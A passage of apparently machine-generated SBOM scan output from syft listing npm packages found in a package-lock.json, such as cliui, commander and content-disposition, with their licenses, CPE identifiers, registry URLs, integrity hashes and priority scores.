startLine: 0
message: 'Package discovered: cliui 6.0.0'
title: cliui 6.0.0
description: 'Package discovered: cliui 6.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0b1fbe7259e117a1
name: cliui
version: 6.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:cliui:cliui:6.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/cliui@6.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/cliui/-/cliui-6.0.0.tgz
integrity: sha512-t6wbgtoCXvAzst7QgXxJYqPt0usEfbgQdftEPbLL/cvv6HPE5VgvqCuAIDR0NgU52ds6rFwqrgakNLrHEjCbrQ==
dependencies:
string-width: ^4.2.0
strip-ansi: ^6.0.0
wrap-ansi: ^6.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b756cde7127582a3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: cliui 8.0.1'
title: cliui 8.0.1
description: 'Package discovered: cliui 8.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6699f516cd09331f
name: cliui
version: 8.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:cliui:cliui:8.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/cliui@8.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz
integrity: sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==
dependencies:
string-width: ^4.2.0
strip-ansi: ^6.0.1
wrap-ansi: ^7.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6102e65c9c7e3be7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: clone 2.1.2'
title: clone 2.1.2
description: 'Package discovered: clone 2.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 924490c8cb0d8bef
name: clone
version: 2.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:clone:clone:2.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/clone@2.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/clone/-/clone-2.1.2.tgz
integrity: sha512-3Pe/CF1Nn94hyhIYpjtiLhdCoEoz0DqQ+988E9gmeEdQZlojxnOb74wctFyuwWQHzqyf9X7C7MG8juUpqBJT8w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: de7fc275efead359
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: clsx 2.1.1'
title: clsx 2.1.1
description: 'Package discovered: clsx 2.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1cdd74d474651cd1
name: clsx
version: 2.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:clsx:clsx:2.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/clsx@2.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/clsx/-/clsx-2.1.1.tgz
integrity: sha512-eYm0QWBtUrBWZWG0d386OGAw16Z995PiOVo2B7bjWSbHedGl5e0ZWaq65kOGgUSNesEIDkB9ISbTg/JK9dhCZA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 03115b0621f3a47e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: cluster-key-slot 1.1.2'
title: cluster-key-slot 1.1.2
description: 'Package discovered: cluster-key-slot 1.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 635dabdd9cdc8fd8
name: cluster-key-slot
version: 1.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:cluster-key-slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cluster-key-slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cluster_key_slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cluster_key_slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cluster-key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cluster-key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cluster_key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cluster_key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cluster:cluster-key-slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cluster:cluster_key_slot:1.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/cluster-key-slot@1.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.2.tgz
integrity: sha512-RMr0FhtfXemyinomL4hrWcYJxmX6deFdCxpJzhDttxgO1+bcCnkk+9drydLVDmAMG7NE6aN/fl4F7ucU/90gAA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 56e4289efb51aa13
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: color-convert 2.0.1'
title: color-convert 2.0.1
description: 'Package discovered: color-convert 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fcc3d45495abf3bd
name: color-convert
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:color-convert:color-convert:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color-convert:color_convert:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color_convert:color-convert:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color_convert:color_convert:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color:color-convert:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color:color_convert:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/color-convert@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz
integrity: sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==
dependencies:
color-name: ~1.1.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 568b6e4207edec50
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: color-name 1.1.4'
title: color-name 1.1.4
description: 'Package discovered: color-name 1.1.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9d8d6c4ccfd91cbf
name: color-name
version: 1.1.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:color-name:color-name:1.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color-name:color_name:1.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color_name:color-name:1.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color_name:color_name:1.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color:color-name:1.1.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color:color_name:1.1.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/color-name@1.1.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz
integrity: sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c5d023023358f691
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: color-name 2.1.0'
title: color-name 2.1.0
description: 'Package discovered: color-name 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8dfa4f08fc1899a7
name: color-name
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:color-name:color-name:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color-name:color_name:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color_name:color-name:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color_name:color_name:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color:color-name:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:color:color_name:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/color-name@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/color-name/-/color-name-2.1.0.tgz
integrity: sha512-1bPaDNFm0axzE4MEAzKPuqKWeRaT43U/hyxKPBdqTfmPF+d6n7FSoTFxLVULUJOmiLp01KjhIPPH+HrXZJN4Rg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d0d3f9cc2cfd641a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: color-string 1.9.1'
title: color-string 1.9.1
description: 'Package discovered: color-string 1.9.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b96884f4eed4192d
name: color-string
version: 1.9.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:color-string_project:color-string:1.9.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/color-string@1.9.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/color-string/-/color-string-1.9.1.tgz
integrity: sha512-shrVawQFojnZv6xM40anx4CkoDP+fZsw/ZerEMsW/pyzsRbElpsL/DBVW7q3ExxwusdNXI3lXpuhEZkzs8p5Eg==
dependencies:
color-name: ^1.0.0
simple-swizzle: ^0.2.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b8edaba313b178d2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: color-string 2.1.4'
title: color-string 2.1.4
description: 'Package discovered: color-string 2.1.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1f15e4f4433605fc
name: color-string
version: 2.1.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:color-string_project:color-string:2.1.4:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/color-string@2.1.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/color-string/-/color-string-2.1.4.tgz
integrity: sha512-Bb6Cq8oq0IjDOe8wJmi4JeNn763Xs9cfrBcaylK1tPypWzyoy2G3l90v9k64kjphl/ZJjPIShFztenRomi8WTg==
dependencies:
color-name: ^2.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 227fe4ddfe5bcfb2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: combined-stream 1.0.8'
title: combined-stream 1.0.8
description: 'Package discovered: combined-stream 1.0.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6feb2abce081a13b
name: combined-stream
version: 1.0.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:combined-stream:combined-stream:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:combined-stream:combined_stream:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:combined_stream:combined-stream:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:combined_stream:combined_stream:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:combined:combined-stream:1.0.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:combined:combined_stream:1.0.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/combined-stream@1.0.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz
integrity: sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==
dependencies:
delayed-stream: ~1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: df1825804c4b40ea
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: commander 10.0.1'
title: commander 10.0.1
description: 'Package discovered: commander 10.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 68cb0d0425b8ec71
name: commander
version: 10.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:commander:commander:10.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/commander@10.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/commander/-/commander-10.0.1.tgz
integrity: sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b275a043135b9b63
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: commander 4.1.1'
title: commander 4.1.1
description: 'Package discovered: commander 4.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6ef23c8bf6c64c11
name: commander
version: 4.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:commander:commander:4.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/commander@4.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/commander/-/commander-4.1.1.tgz
integrity: sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: af21f9856150d16c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: concat-stream 1.6.2'
title: concat-stream 1.6.2
description: 'Package discovered: concat-stream 1.6.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ee26fc9f2aa2694f
name: concat-stream
version: 1.6.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:concat-stream:concat-stream:1.6.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:concat-stream:concat_stream:1.6.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:concat_stream:concat-stream:1.6.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:concat_stream:concat_stream:1.6.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:concat:concat-stream:1.6.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:concat:concat_stream:1.6.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/concat-stream@1.6.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz
integrity: sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==
dependencies:
buffer-from: ^1.0.0
inherits: ^2.0.3
readable-stream: ^2.2.2
typedarray: ^0.0.6
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6a853859517f2ba3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: config-chain 1.1.13'
title: config-chain 1.1.13
description: 'Package discovered: config-chain 1.1.13'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f8adcbfce494f378
name: config-chain
version: 1.1.13
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:config-chain:config-chain:1.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:config-chain:config_chain:1.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:config_chain:config-chain:1.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:config_chain:config_chain:1.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:config:config-chain:1.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:config:config_chain:1.1.13:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/config-chain@1.1.13
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz
integrity: sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ==
dependencies:
ini: ^1.3.4
proto-list: ~1.2.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: aa020ae4ab2eadc3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: content-disposition 0.5.4'
title: content-disposition 0.5.4
description: 'Package discovered: content-disposition 0.5.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5a8a76bf321e2afc
name: content-disposition
version: 0.5.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:content-disposition:content-disposition:0.5.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content-disposition:content_disposition:0.5.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content_disposition:content-disposition:0.5.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content_disposition:content_disposition:0.5.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content:content-disposition:0.5.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content:content_disposition:0.5.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/content-disposition@0.5.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz
integrity: sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==
dependencies:
safe-buffer: 5.2.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9a45820ffdb99ef9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: content-type 1.0.5'
title: content-type 1.0.5
description: 'Package discovered: content-type 1.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e6774efb67a1cd80
name: content-type
version: 1.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
